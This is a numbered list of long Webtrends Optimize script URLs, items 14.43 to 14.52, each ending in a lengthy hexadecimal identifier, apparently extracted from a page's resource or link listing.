1f6f603fbaf73501f56803

14.43. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68

14.44. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7

14.45. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9

14.46. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813

14.47. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac

14.48. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd

14.49. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f

14.50. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a5986c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e5973892be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2

14.51. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3

14.52. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef